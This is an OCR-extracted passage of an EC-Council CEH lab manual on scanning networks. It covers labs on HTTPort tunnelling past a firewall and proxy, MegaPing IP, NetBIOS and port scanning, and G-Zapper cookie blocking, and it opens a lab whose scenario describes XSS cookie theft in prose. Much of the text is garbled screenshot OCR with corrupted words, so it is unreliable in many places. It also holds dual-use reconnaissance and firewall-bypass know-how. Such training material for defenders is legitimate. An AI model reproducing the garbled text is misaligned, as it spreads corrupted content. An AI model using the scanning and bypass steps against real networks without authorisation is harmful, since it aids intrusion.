© C o r e Netw orking - Router SoKckation (1C... W indows Firewall w ith Adv; C nfcound Rules C O utbound Rules Connecbon Security Rul t M onitoring FIGURE 14.19: Windows Firewall New rule 37. Right-click die newly created rule and select Properties Windows Firewall with Advanced Security* File A ction View H d p * ‫►י‬ ^ q ! I Actions Outbound Rules - New Rule... V Filter by Profile ► V Filter by State ► V Fliter by Group ► View Refresh ^ Export List... Q Help ► Port 21 Blocked - ♦ Disable Rule 4 c ‫״‬ t •41 Copy X Delete Properties 0 Help Group * Profie Enal Disable Rule Branc hCac he ‫־‬ Cor BranchCache - Hos Cut BranchCache ‫־‬ Ho: C op y BranchCache - Pee Core Netw orking Lore Networking Delete Properties H d pCore Netw orking Core Netw orking D om *n Vet Core Networking Do»n*n Ves Core Networking Domain Ye* Core Netw orking A l Vet Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yb Core Netw orking A l Yes Core Networking A l YCS Core Netw orking r . . . *■------- 11— A l Yes Nam e O .P0 rt2 1 Blockcd ^ B ra n c h C a c h e Content Retrieval (HTTP-O‫״‬ . © B ran ch C ach e H osted C ache C iem (H T T ‫״‬ . © B ran ch C ach e H osted C ache Saver(HTTP_ © B ran ch C ach e Peet D isccvay (WSO‫־‬OulJ © C o i e Networking - D f5 (U 0P -0u t) © C o r e Networking D >nanvc H c itC c n fig .. © C o r e N etw orbng • D>nrn» Most Config... © C o r e N etw orbng • Group Policy (ISASS-... © C o r e Networking Group Policy (NP-Out) © C o r e Networking Group Policy (TCP0 ‫-־‬ © C o r e N etw orbng • Intern*! G ioup Mana.. © C o r e Networking IPHTTPSfTCP-Out) © C o r e N etw orbng - IPv6 (1P»‫<־$׳‬XjtJ © C o r e N etw orbng - M ufticest Listener Do... © C o r e N etw orbng - M J c c a st Listener Qu... © C o r e N e r w c r b n g - M J b c sst Listener Rep... © C o r e N etw orbng - M ulbcesi Listener Rep... © C o r e N etw orbng - N eighbor D iscovery A‫.״‬ © C o r e N etw orbng N eighbor D iscovery S... l© C cr e N etw orbng ■ Packet Too Big (ICMP... © C o r e N etw orbng • Paiam eter Problem (1-‫״‬ © C o r e N etw orbng Reuter A dvcnscm cn t... © C o r e N etw orbng * R culet Solicitation (IC~ g f W indows Firewall w ith Adv; C l inbound Rules O O utbound Rulea Connection Security Rul X/ M onitoring 1 the properties dialog box for the current seleajon FIGURE 14.20: Windows Firewall new rule properties 38. Select die Protocols and Ports tab. Change die Remote Port option to Specific Ports and enter die Port number as 21 39. Leave die other settings as dieir defaults and click Apply dien click OK. ^ HTTPort doesn't really care for the proxy as such: it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through. S HTTPort then intercepts that connection and runs it through a tunnel through the proxy. £ 7 Enables you to bypass your HTTP proxy in case it blocks you from the Internet Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 232
  • 150. Module 03 - Scanning Networks i— ‘With HTTPort, you can use various Internet software from behind the proxy, e.g., e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC etc. The basic idea is that you set up your Internet software 40. Type ftp ftp.certifiedhacker.com in the command prompt and press Enter. The connection is blocked in Windows Server 2008 by firewall ‫ד‬*Port 21 Blocked Properties jerteral_________Pngams and Services Remote Conpjtefs Protocolt and Fore | Scope | Advancec j Local Princpab All Potto Exampb. 80. 443.5003-5010 FVwocob and po*s Prctocdtype: Prctocd ru nber Loco port Specifc PatsRemote p3rt: [21 Example. 80. 443.5003-5010 I Custonizo.hten‫־‬et Gortnd Message Protocol (C M P)« ting*: FIGURE 14.21: Firewall Port 21 Blocked Properties £3 HTTPort does neither freeze nor hang. What you are experiencing is known as ‫״‬blocking operations” FIGURE 14.22: ftp connection is blocked 41. Now open die command prompt 011 die Windows Server 2012 host machine and type ftp 127.0.0.1 and press Enter 7 ^ HTTPort makes it possible to open a client side of a T CP/IP connection and provide it to any software. The keywords here are: "client" and "any software". C E H Lab M anual Page 233 Ethical H acking and Counterm easures Copyright © by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited
  • 151. Module 03 - Scanning Networks FIGURE 14.23: Executing ftp command Lab Analysis Document all die IP addresses, open ports and running applications, and protocols you discovered during die lab. Tool/Utility Information Collected/Objectives Achieved H T T Port Proxy server Used: 10.0.0.4 Port scanned: 80 Result: ftp 127.0.0.1 connected to 127.0.0.1 P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D TO T H I S LAB. Questions 1. How do you set up an HTTPort to use an email client (Oudook, Messenger, etc.)? 2. Examine if software does not allow editing die address to connect to. Internet Connection Required es0 Y Platform Supported 0 Classroom □ No □ iLabs C E H Lab M anual Page 234 Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 152. Module 03 - Scanning Networks Basic Network Troubleshooting Using MegaPing MegaPingis an ultimate toolkitthatprovides completeessentialutilitiesfor information systemadministrator andIT solutionproviders. icon key Lab Scenario You have learned in the previous lab that HTTP tunneling is a technique where communications within network protocols are captured using the HTTP protocol. For any companies to exist 011 the Internet, they require a web server. These web servers prove to be a high data value target for attackers. Tlie attacker usually exploits die WWW server running IIS and gains command line access to the system. Once a connection has been established, the attacker uploads a precompiled version o f the HTTP tunnel server (lits). With the lits server set up the attacker then starts a client 011 his 01‫־‬her system and directs its traffic to the SRC port of the system running the lits server. This lits process listens 011 port 80 of the host WWW and redirects traffic. Tlie lits process captures the traffic in HTTP headers and forwards it to the WWW server port 80, after which the attacker tries to log in to the system; once access is gained he or she sets up additional tools to further exploit the network. MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. 111 diis lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues. Lab Objectives This lab gives an insight into pinging to a destination address list. It teaches how to: ■ Ping a destination address list ■ Traceroute ■ Perform NetBIOS scanning / / Valuable information s Test your knowledge Web exercise m Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 235
  • 153. Module 03 - Scanning Networks Lab Environment To cany out die lab, you need: ■ MegaPing is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsM egaPing ■ You can also download the latest version of Megaping from the link http: / / www.magnetosoft.com/ ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ Administrative privileges to run tools ■ TCP/IP settings correcdy configured and an accessible DNS server ■ This lab will work in the CEH lab environment, on W indows Server 2012, W indows 2008, and W indows 7 Lab Duration Time: 10 Minutes CD Tools demonstrated in this lab are available in D:CEH• ToolsCEHv8 Module 03 Scanning Networks PIN G stands for Packet Internet Groper. Overview of Ping Tlie ping command sends Internet Control M essage Protocol (ICMP) echo request packets to die target host and waits for an ICMP response. During diis request- response process, ping measures die time from transmission to reception, known as die round-trip time, and records any loss packets. Lab Tasks 1. Launch the Start menu by hovering die mouse cursor on the lower-left corner of the desktop. T A S K 1 IP Scanning FIGURE 13.1: Windows Server 2012 - Desktop view 2. Click die MegaPing app to open die MegaPing window. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 236
  • 154. Module 03 - Scanning Networks FIGURE 15.2: Windows Server 2012 - Apps TQi^MegaPing ma!1^ n n d o w ^ ^ h o ^ M 1^ h ^ b llo n n ^ 1‫־‬gu1^ ^ ^ 55 MegaPing (Unregistered) - □ ' x ‫ד‬ 3. File V ie w T o o ls H d p ‫&י־‬ D N S L id rto sfe * D N S L o o k u p N a m e Q F n g c r 1S N e tw o rk T im e g g P in g g g T raceroute Who 11 ^ N e tw o rk R# toufc# t <<•> P ro c e ss Info S ystam Info £ IP S can n er $ N etBIO S S can n er •'4? Share S can n er ^ S e cu rity S can n er - J ? P o rt S can n er J i t H o s t M o n ito r *S L b t H o>ts Figure15.3: MegaPing main windows 4. Select any one of die options from the left pane of the window. 5. Select IP scanner, and type in the IP range in die From and To field; in this lab the IP range is from 10.0.0.1 to 10.0.0.254. Click Start 6. You can select the IP range depending on your network. CQ All Scanners can scan individual computers, any range of IP addresses, domains, and selected type of computers inside domains Security scanner provides the following information: NetBIOS names, Configuration info, open TCP and UDP ports, Transports, Shares, Users, Groups, Services, Drivers, Local Dhves, Sessions, Remote Time of Date, Printers Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 237
  • 155. Module 03 - Scanning Networks ‫־‬°rMegaPing (Unregistered)fs r File V « ‫*׳‬/ T o o k H elp f t f t ^ * %v ^ a* 3 < DNS L st H osts r ^ — _ r « a P -1'SW W IP Scanner S s t n g jt I3Scanner Select ira c c ro u tc W h o K I “ I | 10 0 0 1 10 0 0 254 | 1 S M 1 N e tw o rk R esou rces ► S c a m •‫׳׳‬ .3‫׳‬ * t D N S L o o k u p N a m e § Fin ger N e tw o rk T im e 8 a8 P in g <§> Process In fo ^ S ystem Info ■*iiaui.111 ■ £ N etBIO S S canner Y * Share S can n er j& S ecurity Scanner ^ P o rt S can n er ^ H o s t M o n ito r FIGURE 15.4: MegaPing IP Scanning It will list down all the IP ad dresses under that range with their TTL (Time to Live), Status (dead or alive), and die sta tistics of the dead and alive hosts. MegaPing (Unregistered) IP 5 i« n n w $ IP Scanner S atn g eX IP S a n n a r Setect- |R arge 10 . 0 0 . 1 10 0 0 251 I Start F S c a r e Status: Zoroetec 25^ adcresees in 15 8ccs Show MAC Addresses Hosts Stats T old . 254 Active 4 Paled: 250 Report *ddrest Name True T T L Statj* .= 1 10.0.0.1 0 &4 A fiv e g 1 a 0 .0 4 1 128 Abve g 10.0.0.6 0 128 A S ve £ 1ao.o.7 0 128 Afcve g 1a0.0.10 O a t . . JQ 10.0.0.100 D e s t.. g 1010.0.101 D e st._ 1a0.0.102 D est — £ 10.0.0.105 De«t._ g 10.0.0.104 D est — g 10.0.0.105 Dest P ie View T o o ls H elp 1 1 g f t A <> i , d r j ‫כ‬ L.st 1lo s ti ,p , D N S L o o k u p N a m e Q Finger a N e tw o rk T im e t l P in g T race rcu te HVhols 1“ 5 N e tw o rk R esources % rocess Info ^ S ystem Info N etBIO S S can n er y * Share Scanner $ S ecurity S co n ner l . J j ? Port Scanner J S i H o s t M o n ito r FIGURE 15.5: MegaPing IP Scanning Report 8. Select the NetBIOS Scanner from the left pane and type in the IP range in the From and To fields. 111this lab, the IP range is from 10.0.0.1 to 10.0.0.254 Click Start CD N etw ork utilities: DNS list host, DNS lookup name, Network Time Synchroni2er, Ping, Traceroute, Wliois, and Finger. S T A S K 2 NetBIOS Scanning Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 238
  • 156. Module 03 - Scanning Networks T I P If/egaPing (Unregistered)W File V ie w T o o ls H d p rP- A N c G C S S so n rcr J* | D N S L ist H o sts ,5,D N S L o o k u p N a m e g F in g er 3 NetworkTime t S P1n9 T race ro u te & W h o ls N e tw o rk R e s o u rc e <$> P ro c e ss Info 4 S ystem Info ^ IP S can n cr i! Share Scanner ^ S ecurity S can n er ^ P o rt S can n er H o s t M o n ito r NetBIOS Scanner FIGURE 15.6: MegaPing NetBIOS Scanning 9. The NetBIOS scan will list all the hosts with their NetBIOS nam es and adapter ad dresses MegaPing (Unregistered) M e V tfA T o ri? H elp JL JL 4S & *“88a & K«BIT$ Sc^rrer $ MenBIOS S ca rrra^ Net 9 0 $ Scan rer Stop10 0 . 0 .2 5 4 ‫י‬ Expard 1Names Expand Summary ] | 10 . 0 . 0 . 1 ||Rerg5 NstEJOS Scanner aJatLS‫־‬ Z o ro e e c Q uem g Net B O S Names on Stats Told. 131 A c tvc 3 =a!od 123 Report Name STctus 100.0.4 W IN -U L Y 8 3 3 K H Q .. A I v « » 2 ) N etBIO S N am es 3 Wgf A d o p ter A d d ress 00 15-5D 00-0 7 . . M ic ro s o ft ‫״‬ A D o m ain W O R K G R O U P iac.0.6 A D M IN • P C A Jiv c fr] N etBIO S N o m e : 6 W B A dapter A d d ress 00-15-50-00-07‫..־‬ M < ro s o ft ‫״‬ 4^ D o m a in W O R K G R O U P 100.0.7 W IN -D 3 9 M R S H L .. A lv # » j|] N etBIO S N am es 3 X f A d a p te r A d d ress D 4 -B E -D 9 -C 3 -C E .. JJ, D N S L ist H o sts j ! L D N S L o o k u p N a m• Q Finger !3 1N e tw o rk T im e t i p,n9 g*3 T race ro u te ^W hole -O N e tw o rk R esou rces %Process Info J ^ S ystem Info‫״‬‫״‬ ^IP S can n er $m g g n n 1 1?Share S can n er: S ecu rity S can n er y P o rt S can n er/‫״‬ 2 1H o s t M o n ito r NetBIO S S can n er FIGURE 15.7: MegaPing NetBIOS Scanning Report 10. Right-click the IP address. 111 this lab, the selected IP is 10.0.0.4; it will be different in your network. 11. Then, right-click and select the Traceroute option. ‫ס‬ MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more. &r Scan results can be saved in HTML or TXT reports, which can be used to secure your network ■‫־‬for exam ple, by shutting down unnecessary ports, closing shares, etc. 5 T A s K 3 Traceroute Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 239
  • 157. Module 03 - Scanning Networks I I MMegaPing (Unregistered)v File View Tools H d p NctBICS S ca rre ‫־‬ NetBIOS Scanner S9<tngs Stdft0 254 Names Dcpand Summary $ M * 3 0 S Scarner Soeci: Rom: R ange v | 10 0 0 N e tE lO S S e in e r Satus Oroteted ?M addresses m M secs * b‫?׳‬ 3 0 ( jjNome Hoete Slate Total: 254 Actve 3 Failed251 ‫־‬ E xport T o File M e rg e H osts O p en Share V ie w H o t f ix D e ta b A p p ly H o t Fixes C o p y selected item C o p y selected ro w C o p y a ll result; S ave A s _____ B 0 B ■ * D N etBIO S f■ A d a p e e rA A C c m a in - j j 10.0.0.5 i - J | N etBIO S S ? A d o p te r A ^ C o m a in B A 10.0.0.7 £ NetBIG S ‫ף‬ ■3 A d o p te r A T racero ute ^ D N S L ist H o sts ; j , D N S L o o k u p N a m e g F in g er 3 N e tw o rk T im e t®* P in 9 A T race ro u te W h o ls N e tw o rk R esou rces P ro c e ss Info ^ S ystem Info •‫^־‬ IP S can n er ‫׳‬J^ N etBIO S S can n er Share Scanner S ecu rity S can n er ^ P o rt S can n er g l H o s t M o n ito r T ra cc ro u tc s th e se le ctio n FIGURE 15.8: MegaPing Traceroute 12. It will open the Traceroute window, and will trace die IP address selected. MegaPing (Unregistered) F ie V iew T o o ls H elp S. JL 4$ 151*« 88 Tracer0« * a a Traceroute S etth ot** □ Select Al □ R esolve I4an‫־‬s Destrebon: 1 0 0 0 .4 Z te straw n Jdrcs5 Jst Add D dctc Report | hoo Time Name Dstafc ‫י‬91>9 W IN -U L Y 8 S 8 K H C JIP [ 1 _ C o m p le te . 1 m £ 1 0 10.0.0.4 0 & '2 3 /1 2 1 0 t4 4 tf ‫־‬ A ' A D M I N PC [10.0.0.6] C o m p le te . * 4 1 10.0.0.6‫ו‬ 08/23/12 1 Q 4 S J1 J j , D N S L ist H o> b J!L D N S L o o k u p N a m e | J Finger i l l N e tw o rk T im e ^ W h ols - O N e tw o rk R esou rces *■{?> Process Info S ystem Info ■^ IP S can n er N etBIO S S can n er *jp Share S ca n n e i S ecu rity S can n er ‫>׳‬y P o rt Scanner jtA H o» t M o n ito r FIGURE 15.9: MegaPing Traceroute Report 13. Select Port Scanner from die left pane and add w w w .certifiedhacker.com 111 the Destination Address List and then click the Start button. 14. After clicking the Start button it toggles to Stop 15. It will lists the ports associated with www.certifiedl1acker.com with die keyword, risk, and port number. ‫ם‬ Other features include multithreaded design that allows to process any number of requests in any tool at the same time, real- time network connections status and protocols statistics, real-time process information and usage, real-time network information, including network connections, and open network files, system tray support, and more & Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S T A s K 4 Port Scanning Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 240
  • 158. Module 03 - Scanning Networks ‫ן‬v‫ך‬ - ‫י‬ ‫״‬ ‫ז‬ MegaPing (Unregistered) File View Tools Help A A £ GJ 8s 8s <5 J ' b & r H I J & GO J‫!׳‬ jftjf F01 Sc*1r* ‫׳‬^ AotScamcr Pnxowte TCP an: UCP m m <‫»־‬V**tv30‫׳‬ fl‫׳<»־׳‬n Scan Type A /!h »»S Pab -11 S100 Deslnrtor A i^ n t Ua> □ S*t*dAl w»!* | 2or* Type Keyword Os8cr»on R * = S Scanning—(51 %) 3 C e2 fc 99 Sccon ds Remain ‫ח‬g TCP ftp File Transfer [Control] Eksatcd TCP www-http World V.'ide Web HTTP Elevated ,y 1 UDP tcpmux TCP Port Servkc MultL. E le.xed ‫*״‬J. UOP compress.. M anagement Utility L<*m .y! UOP com p ten . CompreiMoo P roem Law . * 5 UOP rje Remote Job Entry Low UOP echo Echo Low y * UOP ditcntd Discard Law ' • - j j, DNS List Hosts ,5 , DNS Lookup Nam e Finger 5 4 Network Time f t Ping g g Traceroute ^Whois N etwoik Resources - ^ Pick m Info System Info ^ IP Sc«nn«< -jjj’ NetBIOS Sc *nn*i Share Seanner j P S*u n ty Scanner j/ J 4 H 05‫ז‬ Monitor FIGURE 15.10: MegaPing Port Scanning Report Lab Analysis Document all die IP addresses, open ports and running applications, and protocols you discovered during die lab. Tool/Utility Information Collected/Objectives Achieved M egaPing IP Scan Range: 10.0.0.1 —10.0.0.254 Perform ed Actions: ■ IP Scanning ■ NetBIOS Scanning ■ Traceroute ■ Port Scanning Result: ■ List of Active Host ■ NetBios Name ■ Adapter Name MegaPing security scanner checks your network for potential vulnerabilities that might use to attack your network, and saves information in security reports Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 241
  • 159. Module 03 - Scanning Networks P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU H A VE Q U E S T I O N S R E L A T E D T O T H I S LAB. Questions 1. How does MegaPing detect security vulnerabilities on die network? 2. Examine the report generation of MegaPing. Internet Connection Required 0 Noes□ Y Platform Supported 0 iLabs0 Classroom Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 242
  • 160. Module 03 - Scanning Networks Lab Detect, Delete and Block Google Cookies Using G-Zapper G-Zapperis a utility to block Goog/e cookies, dean Goog/ecookies, andhelpyon stay anonymousnhile searchingonline. Lab Scenario You have learned in die previous lab diat MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. It provides detailed information about all computers and network appliances. It scans your entire network and provides information such as open shared resources, open ports, services/drivers active 011 the computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML 01‫־‬ TXT reports, which can be used to secure your network. As an administrator, you can organize safety measures by shutting down unnecessary ports, closing shares, etc. to block attackers from intruding the network. As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history. Lab Objectives This lab explain how G-Zapper automatically d etects and clean s the Google cookie each time you use your web browser. Lab Environment To carry out the lab, vou need: I C O N K E Y Valuable information Test your knowledge m. Web exercise o Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 243
  • 161. Module 03 - Scanning Networks G-Zapper is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksAnonymizersG-Zapper You can also download die latest version of G‫־‬Zapper from the link littp://www.dummysoftware.com/ If you decide to download the latest version, then screenshots shown in the lab might differ Install G-Zapper 111 Windows Server 2012 by following wizard driven installation steps Administrative privileges to run tools A computer running W indows Server 2012 Lab Duration Time: 10 Minutes Overview of G-Zapper G-Zapper helps protect your identity and search history. G-Zapper will read die Google cookie installed on your PC, display die date it was installed, determine how long your searches have been tracked, and display your Google searches. G- Zapper allows you to automatically delete or entirely block die Google search cookie from future installation. Lab Tasks S t a s k 1 1 . Launch the Start menu by hovering die mouse cursor on the lower-left Detect & Delete comer of the desktop.____________________________________ Google Cookies FIGURE 16.1: Windows Server 2012 - Desktop view 2. Click die G-Zapper app to open die G‫־‬Zapper window. !3 WindowsServe!2012 * ttcua Stfwr JOtJ ReleaseCmadtte Oatacert* ftabslanuwy. 1uMM>: S ’ Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 244
  • 162. Module 03 - Scanning Networks Administrator £ G-Zapper Start Server Manager Wruiows PowerShel 6009* Chrome H-jpw-V Manager Ancrym.. Surfog Tutonal fLm V # 11 □ Computer Control P w l ItyperV Virtual M «tw w SOL S e na w Q Command Prompt M v <1 l.retox ‫י‬ n $ 51 Ns’tSca'iT... Pro Demo Standard M a w T* 11 FIGURE 162: Windows Server2012- Apps 3. The G-Zapper main window will appear as shown in die following screenshot. G-Zapper ‫־‬ TRIAL VERSION What is G-Zapper G-Zapper -Protectingyou Search Privacy Didyou know •Google stores a unique identifier in a cookie onyour PC, vrfich alows them to track the keywords you search for. G-Zapper w i automatically detect and clean this cookie inyour web browser. Just run G-Zapper, mrwnee the wndow, and en!oyyour enhanced search privacy 2' I A Google Tracking ID oasts on your PC. Your Google ID (Chrome) 6b4b4d9fe5c60cc1 Google nstaled the cookie on Wednesday. September 05.2012 01 54 46 AM Your searches have been tracked for 13 hours «>| No Google searches found n Internet Explorer or Frefox How to Use It « To delete the Google cookie, dck the Delete Cookie button Your identity w i be obscuredfromprevious searches and G-Zapper w i regiiariy dean future cookies. T0 restore the Google search cookie dick the Restore Cookie button htto //www dummvsoftware.com RegisterSettingsTest GoogleRestore CookieDelete Cookie FIGURE 16.3: G-Zapper main windows 4. To delete the Google search cookies, click the D elete Cookie button; a window will appear that gives information about the deleted cookie location. Click OK m G-Zapper xs compatible with Windows 95,98, ME, NT, 2000, XP, Vista, Windows 7. LJ G-Zapper helps protect your identity and search history. G-Zapper will read the Google cookie installed on your PC, display the date it was installed, determine how long your searches have been tracked, and display your Google searches Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 245
  • 163. ■ ] jlF x ‫י‬‫י‬ G-Zapper - TRIAL VERSION Module 03 - Scanning Networks What is G-Zapper G-Zapper ‫־‬Protectng your Search Privacy Didyou know ■Google stores a unique identifier n a cookie on you PC, v*»ch alows them 10 track the keywordsyou search for G-Zapper w i automatically defect and dean this cookie inyour web browser. -J 1 1 sL (1 jn -fi-7 a n n ftt th e , w n d n w * i n i ftn in u .u n u i ^ n h a o c a d n c iY ^ u _________ _________ G‫־‬Zapper The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com The cookie was located at (Firefox) C:UsersAdministratorApplication DataMozillaFirefoxProfiles5vcc40ns.defaultcookies.sqlite © OK T0 block and delete the Google search cookie, click the Block Cookie button (Gmail andAdsense w i be unavaJable with the cookie blocked) http //www.dummvsoftware com ■# Howt RegisterSettingsTest GoogleBlock CookieDelete Cookie C] A new cookie will be generated upon your next visit to Google, breaking the chain that relates your searches. FIGURE 16.4: Deleting search cookies 5. To block the Google search cookie, click die Block cookie button. A window will appear asking if you want to manually block the Google cookie. Click Yes ' - mG‫־‬Zapper - TRIAL VERSION What is G-Zapper G-Zapper -Protectngyou Search Privacy Didyou know -Google stores a unique identifier ina cookie onyour PC. which alows them to track the keywordsyou search for. G-Zapper will automatically detect and dean this cookie inyou web browser. p__ .LMiijnfi-Zanrret mrnnnrethe,wnrinw andpjiinu.unu..ftnhanrarisftatnhnrtwra______ _____ Manually Blocking the Google Cookie Gmail and other Google services will be unavailable while the cookie is manually blocked. If you use these services, we recommend not blocking the cookie and instead allow G-Zapper to regularly clean the cookie automatically. Are you sure you wish to manually block the Google cookie? NoYes How T0 block and delete the Google search cookie, click the Block Cookie bUton (Gmail andAdsense w l be unavaiaWe with the cookie blocked) http //www dummvsoftware,com RegisterSettingsTest GoogleBlock CookieDelete Cookie FIGURE 16.5: Block Google cookie 6. It will show a message diat the Google cookie has been blocked. To verify, click OK ‫ס‬ The tiny tray icon runs in the background, takes up very little sp ace and can notify you by sound & animate when the Google cookie is blocked. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 246
  • 164. Module 03 - Scanning Networks G‫־‬Zapper - TRIAL VERSION What isG-Zapper G-Zappef -Protecbngyour Search Privacy Didyou know ■Google stores a unique identtfier in a cookie onyour PC. which alows themto track the 1 ^ 0 keywordsyou search for GZapper will automatically detect and dean this cookie n you web browser. Just run GZapper, mmmize the wrxlow. and enjoyyour enhanced search privacy G‫־‬Zapper The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify. OK Your identity will be obscured fromprevious searches and G-Zapper w i regularly clean future cookies T0 restore the Google search cookie clck the Restore Cookie button http //www dummvsoftware com How t RegtsterSettingsTest GoogleRestore CookieDelete Cookie FIGURE 16.6: Block Google cookie (2) 7. To test the Google cookie that has been blocked, click the T est Google button. 8. Yoiu default web browser will now open to Google’s Preferences page. Click OK. AAgoog... P - 2 (5 [ 0 ?references ‫יו‬ - ♦You Search Images Maps Play YouTube News Gmal More ‫־‬ Sign in 1 GoflfllsAccount 5£tt303 Piefeiences Help IAbout Google Save Preferences PreferencesGoogle S a v e your p r e fe rv n cv » w h e n fin ish e d a n d !* tu r n t o i w r c h Global Preferences (changocapplyto al Googio sorvtcos) Y o u r c o o k ie s se em to be disabled. Setting preferences will not work until you enable cookies in your browser. Interface Language Display GoogioTipsand messages in: Engiisn ttyou do not findyour native language in the pulldown above you can help Google create itthroughour Google in Your Ianfliiage program Piefei pages mitten inthese language(*) □ Afrikaans b£English U Indonesian LI Serbian □ Arabic L. Esperanto U Italian □ Slovak D Armenian I~ Estonian FI Japanese 0 Slovenian □ Belarusian CFlipino □ Koiean G Spanish U Bulgarian L Finnish U Latvian LI Swahi Search Ianguage FIGURE 16.7: Cookies disabled massage 9. To view the deleted cookie information, click die Setting button, and click View Log in the cleaned cookies log . & ‫־‬ G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It's far too easy for som eone using your PC to get a glimpse of what you've been searching for. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 247
  • 165. Module 03 - Scanning Networks ‫׳‬ - mG‫־‬Zapper - TRIAL VERSION What is G-Zapper G‫־‬Zapper Settings Sounds Preview Browsef* Ray sound effect when a cookie is deleted defaultwav GoogleAnalytics Trackng W Block GoogleAnalytics fiom tiackng web sites that I visit. View Log Deaned Cookies Log Clear LogW Enable logging of cookies that have recently been cleaned. I” Save my Google ID in the deaned cookies log. OK RegisterSettingsRestore Cookie Test GoogleDelete Cookie Q You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy FIGURE 16.8: Viewingthe deleted logs 10. The deleted cookies information opens in Notepad. cookiescleaned - Notepad t ‫ם‬[‫־־‬ x File Edit Format View Help (Firefox) C :UsersAdministratorApplication DataMozillaFirefox Profiles5vcc40ns.defaultcookies.sqlite Friday, August 31, 2012 10:42:13 AM (Chrome) C :UsersAdministratorAppDataLocalGoogleChromeUser Data DefaultCookies Friday, August 31, 2012 11:04:20 AM (Firefox) C :UsersAdministratorApplication DataMozillaFirefox Profiles5vcc40ns.defaultcookies.sqlite Friday, August 31, 2012 11:06:23 AM (Firefox) C :UsersAdministratorApplication DataMozillaFirefox Profiles5vcc40ns.defaultcookies.sqlite Wednesday, September 05, 2012 02:52:38 PM| S ' Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks FIGURE 16.9: Deleted logs Report Lab Analysis Document all the IP addresses, open ports and running applications, and protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 248
  • 166. Module 03 - Scanning Networks Tool/Utility Information Collected/Objectives Achieved G‫־‬Zapper Action Performed: ■ Detect die cookies ■ Delete the cookies ■ Block the cookies Result: Deleted cookies are stored in C:UsersAdministratorApplication Data P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine how G-Zapper automatically cleans Google cookies. 2. Check to see if G-zappei is blocking cookies on sites other than Google. Internet Connection Required es0 Y Platform Supported 0 Classroom □ No □ iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 249
  • 167. Module 03 - Scanning Networks Lab Scanning the Network Using the Colasoft Packet Builder The ColasoftPacketBuilderis a usefultoolfor creatingcustom nehrorkpackets. Lab Scenario 111 die previous lab you have learned how you can detect, delete, and block cookies. Attackers exploit die XSS vulnerability, which involves an attacker pushing malicious JavaScript code into a web application. When anodier user visits a page widi diat malicious code in it, die user’s browser will execute die code. The browser lias 110 way of telling the difference between legitimate and malicious code. Injected code is anodier mechanism diat an attacker can use for session liijacking: by default cookies stored by the browser can be read byJavaScript code. The injected code can read a user’s cookies and transmit diose cookies to die attacker. As an expert ethical hacker and penetration tester you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields, encoding input and output and filter meta characters in the input and using a web application firewall 